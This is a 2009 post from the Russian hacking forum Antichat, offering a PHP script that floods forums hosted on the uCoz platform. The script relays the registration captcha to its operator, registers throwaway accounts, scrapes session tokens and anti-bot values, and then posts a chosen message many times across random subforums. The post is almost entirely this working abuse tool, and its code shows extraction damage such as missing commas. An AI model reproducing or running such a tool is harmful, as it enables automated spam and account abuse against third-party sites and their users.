ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Перезагрузить страницу Флудер форумов ucoz.ru
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

Флудер форумов ucoz.ru
  #1  
Старый 22.01.2009, 23:17
Аватар для Артем Солнце
Артем Солнце
Banned
Регистрация: 19.01.2009
Сообщений: 26
Провел на форуме:
161729

Репутация: 67
По умолчанию Флудер форумов ucoz.ru
PHP код:
<?php 
#if(isset($_POST['password']) && $_POST['password']=='0123'){ 
set_time_limit(0); 
ob_implicit_flush (); 
function get($url$postdata$cookie$ref$h){ 
    $cp curl_init(); 
    curl_setopt ($cpCURLOPT_URL$url); 
    curl_setopt($cpCURLOPT_RETURNTRANSFER1);  
    if($h==1) {curl_setopt($cpCURLOPT_HEADER1);} else {curl_setopt($cpCURLOPT_HEADER0);} 
    curl_setopt($cpCURLOPT_TIMEOUT,17);  
    if(!empty($ref))curl_setopt($cpCURLOPT_REFERER$ref); 
    if(!empty($cookie))curl_setopt($cpCURLOPT_COOKIE$cookie);  
    if(!empty($postdata))curl_setopt($cpCURLOPT_POSTTRUE); 
    if(!empty($postdata))curl_setopt($cpCURLOPT_POSTFIELDS,$postdata); 
    $data curl_exec ($cp); 
    curl_close ($cp); 
    return $data;     } 
    function get2($serv,$fp$url$post_data,$ref,$cookies,$t){ 
    if(!$fp){$fp=fsockopen($serv,80);} 
    if(!empty($post_data)){$header  "POST $url HTTP/1.1\r\n";} 
    elseif(empty($post_data)){$header  "GET $url HTTP/1.1\r\n";} 
    $header .= "Host: $serv\r\n"
    $header .= "Connection: Keep-Alive\r\n"
    if(!empty($ref)){$header .= "Referer: http://$serv/forum/$ref-0-0-1-1\r\n";} 
    if(!empty($cookies)){$header .= "Cookie: $cookies\r\n";} 
    $header .= "Content-Type: application/x-www-form-urlencoded\r\n"
    if(empty($post_data)){$header .= "\r\n";} 
    elseif(!empty($post_data)){$header .= "Content-Length: ".strlen($post_data)."\r\n\r\n"
    $header .= $post_data;} 
    fputs($fp$header); 
    if($t=='full'){while(!feof($fp)){@$data .=fread($fp,900);}} 
    elseif($t=='poh'){$data=fread($fp,900);} 
    return $data;} 
if(isset($_GET['TEST']) && preg_match("/secure\/6-0-[0-9]{1,90}/",$_GET['TEST'])){$test=$_GET['TEST'];$data=get($test,"","","","",0);die($data);} 

elseif(!isset($_GET['TEST']) && !isset($_POST['img']) && !isset($_POST['lol']) && !isset($_POST['serv']) && !isset($_POST['cookie']) && !isset($_POST['forum']) && !isset($_POST['header']) && !isset($_POST['text'])){ 
die(
<Br><br><Br><BR><bR> 
<form method=post> 
forum(http://lala.clan.su/forum/): <br><input name=forum size=90><br> 
<input type=submit> 
</form> 
"); 

elseif(isset($_POST['forum']) && !isset($_GET['TEST']) && !isset($_POST['img']) && !isset($_POST['lol']) && !isset($_POST['serv']) && !isset($_POST['cookie']) && !isset($_POST['header']) && !isset($_POST['text'])) 

$forum=$_POST['forum']; 
$foruma=parse_url($forum); 
$serv=$foruma['host']; 
$data=get("http://$serv/index/3","","","",1); 
if(preg_match("/src=\"(http:\/\/$serv\/secure\/6-0-[0-9]{1,90})\"/is",$data,$maq)){ 
$img="http://".$_SERVER['SERVER_NAME'].$_SERVER['SCRIPT_NAME']."?TEST=".$maq[1]; 
die("<img src=".$img."width=70 height=70><form method=post><input name=img size=47><input type=hidden name=forum value=$forum><br><input type=submit></form>"); 
}else die('cannot find captcha'); 

elseif(isset($_POST['forum']) && !isset($_GET['TEST']) && isset($_POST['img']) && !isset($_POST['lol']) && !isset($_POST['serv']) && !isset($_POST['cookie']) && !isset($_POST['header']) && !isset($_POST['text']) && !isset($_POST['login']) && !isset($_POST['password'])) 

$forum=$_POST['forum']; 
$foruma=parse_url($forum); 
$serv=$foruma['host']; 
$login="LOGIN".rand(1,999); 
$password="qq".rand(12,9000); 
$post="jkd498=1&jkd428=1&user=$login&password=$password&password1=$password&name=FULL".rand(1,999)."&email=E-".rand(1,999)."[Педобот! Ссылки могут видеть только зарегистрированные пользователи. Зарегистрироваться...]&home_page=&icq=".rand(99999,99999)."&by=1975&bm=12&bd=31&gender=1&avatar=&signature=hek&code=$img&a=4&s=0"
$url="http://$serv/index/"
$data=get($url,$post,"","",1); 
if(eregi("Неправильный код",$data)){die('wrong code ;)');} 
 die("<font color=green><b>USER $login WAS SUCCESSFULLY REGISTERED</b></font><br> 
 <form method=post> 
forum: <input name=forum value='$forum'><br> 
tema:  <input name=header value='TEMA'><br> 
text:   <textarea cols=20 rows=3 name=text>TEXT</textarea><br> 
skoka zaprosov:    <input name=skoka value='50'><br> 
login:     <input name=login value='$login'><br> 
password:      <input name=password value='$password'><br> 
 <input type=submit value='Go to part #2 :D'> 
</form> 
"); 

elseif(!isset($_GET['TEST']) && !isset($_POST['img']) && !isset($_POST['lol']) && !isset($_POST['serv']) && !isset($_POST['cookie']) && isset($_POST['forum']) && isset($_POST['header']) && isset($_POST['text']) && isset($_POST['skoka']) && isset($_POST['login']) && isset($_POST['password'])) 

$forum=$_POST['forum']; 
$login=$_POST['login']; 
$password=$_POST['password']; 
$tema=urlencode($_POST['header']); 
$text=urlencode($_POST['text']); 
if(isset($_POST['skoka'])){(int)$skoka=$_POST['skoka'];}else $skoka=10
$pars=parse_url($forum); 
$serv=$pars['host']; 
$url2=$pars["path"]; 
$url1="http://$serv/index/"
$data=get($url1,"user=$login&password=$password&rem=1&hidden=1&a=2&ajax=2","","",1); 
#################################### 
#################################### 
echo("<b>Trying to login:</b> "); 
if(preg_match("/Set-Cookie: (.*?);/is",$data,$mat)){ 
echo("<b><font color=green>SUCCESS</font></b><Br>"); 
$cookie=($mat[1]);unset($data); 
$data=get("http://$serv/forum/","","","",1); 
echo("<b>Searching for forums:</b> "); 
if(preg_match_all("/<a class=\"forum\" href=\"http:\/\/$serv\/forum\/([0-9]{1,900})\">/",$data,$mat)){ 
$arr=$mat[1];#die($mat[1][1]); 
$lala=$arr[rand(0,count($arr)-1)]; 
echo("<b><font color=green>SUCCESS, found ".count($arr)." forums</font></b><br>"); 
$test="http://".$serv."/forum/$lala-0-0-1-1";#die($test); 
$data=get($test,"",$cookie,"",1); 
echo("<b>Trying to get \$SSID:</b> "); 
if(preg_match("/\"ssid\" value=\"([0-9]{20,30})\"/",$data,$mad)) 
        { 
            $ssid=($mad[1]); 
            echo("<b><font color=green>\$SSID FOUND!: $ssid</font></b><br>"); 
            if(preg_match("/<script type=\"text\/javascript\">var (.*?)\'\);<\/script>/",$data,$lolo)){ 
            $lolo0=$lolo[0]; 
            foreach($arr as $ar){$re.="$ar,";} 
            $re=base64_encode($re); 
            echo("<form method=post name=f1><input type=hidden name=lol value=''> 
            <input type=hidden name=forum value='$forum'> 
            <input type=hidden name=cookie value='".urlencode(base64_encode($cookie))."'> 
            <input type=hidden name=header value='$tema'> 
            <input type=hidden name=text value='$text'> 
            <input type=hidden name=skoka value='$skoka'> 
            <input type=hidden name=serv value='$serv'> 
            <input type=hidden name=re value='$re'> 
            <input type=submit value='im ready ) start :D'>"); 
            $lolo0=str_replace("return r","return document.f1.lol.value = escape(r)",$lolo0); 
            die($lolo0); 
            } else die("<br>CANNOT GET SPECIAL CONTENT."); 

        } else die("<b><font color=red>FAILED!!!!</font></b>"); 

} else die("<b><font color=red>FAILED!!!!</font></b>"); 

}else die('wrong login/pass or cant connect'); 

elseif(!isset($_GET['TEST']) && !isset($_POST['img']) && isset($_POST['re']) && isset($_POST['skoka']) && isset($_POST['serv']) && isset($_POST['lol']) && isset($_POST['cookie']) && isset($_POST['forum']) && isset($_POST['header']) && isset($_POST['text'])){ 
$re=base64_decode($_POST['re']); 
$arr=explode(",",$re); 
$serv=$_POST['serv']; 
$lol=urldecode($_POST['lol']); 
$skoka=$_POST['skoka']; 
$cookie=$_POST['cookie']; 
$cookie=urldecode($cookie); 
$cookie=base64_decode($cookie); 
$tema=$_POST['header']; 
$text=$_POST['text']; 
$lala=$arr[rand(0,count($arr)-2)]; 
if(preg_match("/name=\"([a-z0-9]{1,90})\" value=\"([0-9]{1,90})\" \/>/",$lol,$mat)){ 
$key1=$mat[1]; 
$value1=$mat[2]; 
            $fp=fsockopen($serv,80); 
if(!$fp){$fp=fsockopen($serv,80);} 
            if($fp){ 
if(!$fp){$fp=fsockopen($serv,80);} 
            echo("<h1>STARTING Fl00d</h1><br>"); 
            $count=0
            for($i=0;$i<$skoka;$i++) 
            { 
            $lala=$arr[rand(0,count($arr)-2)]; 
            $post_data="jkd498=1&jkd428=1&name=$tema&description=&fsize=0&ffont=0&fcolor=0&tagcount=0&message=$text&smiles_on=1&signature_on=1&syst=&ssid=$ssid&fid=$lala&tid=0&p=0&a=4&$key1=$value1"
            $data=null;#die($data."<br><br><br><br>$post_data"); 
            unset($data); 
            $urla="/forum/"
            if(!$fp){$fp=fsockopen($serv,80);} 
            $data=get2($serv,$fp,$urla,$post_data,$lala,$cookie,'poh'); 
            if(eregi("302 Found",$data)){$count++;} 
            } 
            fclose($fp); 
            die('<script>alert("DONE! You have sended '.$count.' messages");</script>'); 
            } 
} else die("Cannot calculate special content. Please report."); 

else die(666); 
#} else die('u dont have access.'); 
?>
(с) http://narod.ru/disk/3865900000/ucoz.php.html
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
форумные движки: обзор и обсуждение nerezus ПО для Web разработчика 61 29.04.2010 10:08
Спам по личкам форумов - Время Скидок! :) prizrakus О Работе 2 10.01.2010 22:05
Флудер для чатов на Voodoo движке NaX[no]rT Чаты 5 06.04.2006 20:54
Внимание! Найдена уязвимость форумов на offtop.ru! Black_Kardinal Форумы 14 09.01.2006 13:58



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ